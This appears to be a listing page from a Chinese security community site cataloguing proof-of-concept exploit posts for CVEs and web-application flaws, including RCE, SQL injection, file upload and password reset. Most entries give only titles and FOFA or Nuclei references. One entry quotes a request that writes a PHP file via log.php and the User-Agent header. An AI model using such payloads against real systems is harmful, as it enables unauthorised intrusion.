poc 第28页
【通用】 Craft CMS模板注入导致RCE(CVE-2024-56145)_秃兔安全

【通用】 Craft CMS模板注入导致RCE(CVE-2024-56145)

fofa语句yakit插件 uuidnuclei yaml只写了快速检验是否存疑的脚本,具体的利用方式在网上可以找得到。 
dreamer292的头像_秃兔安全至尊玉兔dreamer2922年前
01617
【2025特殊通用】汉王e脸通综合管理平台 meetingFileManage SQLi_秃兔安全
【通用】成都朗速ERP系统 WebDwgDefault 任意文件上传_秃兔安全

【通用】成都朗速ERP系统 WebDwgDefault 任意文件上传

fofa语句yakit插件 uuidpocyaml 已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
01137
【通用】usdtAdmin收款管理系统log.php 任意文件写入_秃兔安全

【通用】usdtAdmin收款管理系统log.php 任意文件写入

fofa语句yakit插件 uuidpocPOST /log.php?c=1&name=123.php HTTP/1.1 Host: xxxx User-Agent: <?php echo 66666;@unlink(__FILE__);?> content=MTIzNDU2 #具体路径会回显。另外注意ua...
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
02047
【通用】JeecgBoot passwordChange 任意用户密码重置漏洞_秃兔安全

【通用】JeecgBoot passwordChange 任意用户密码重置漏洞

fofa 语句yakit插件 uuidpocyakit && nuclei yaml已验证   
【通用】 快云服务器小助手 getdetail 存在任意文件文件读取漏洞_秃兔安全

【通用】 快云服务器小助手 getdetail 存在任意文件文件读取漏洞

fofa语句yakit插件 uuidpocyakit && nuclei yaml已验证   
【通用】飞致云 DataEase JWT 硬编码身份认证绕过漏洞 (CVE-2024-52295)_秃兔安全
【2025特殊通用】飞企互联FE remoteServlet RCE_秃兔安全

【2025特殊通用】飞企互联FE remoteServlet RCE

fofa语句pocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
01137
【通用】 协众OA系统接口checkLoginQrCode SQL注入漏洞_秃兔安全

【通用】 协众OA系统接口checkLoginQrCode SQL注入漏洞

fofa语句yakit插件uuidpocyakit && nuclei yaml已验证   
【通用】Spring Framework存在目录遍历漏洞(CVE-2024-38819)_秃兔安全

【通用】Spring Framework存在目录遍历漏洞(CVE-2024-38819)

影响版本5.3.0 <= Spring Framework <= 5.3.406.0.0 <= Spring Framework <= 6.0.246.1.0 <= Spring Framework <= 6.1.13较旧的、不受支持的 Spring 版本也容易受到攻击 fof...
dreamer292的头像_秃兔安全至尊玉兔dreamer2922年前
03406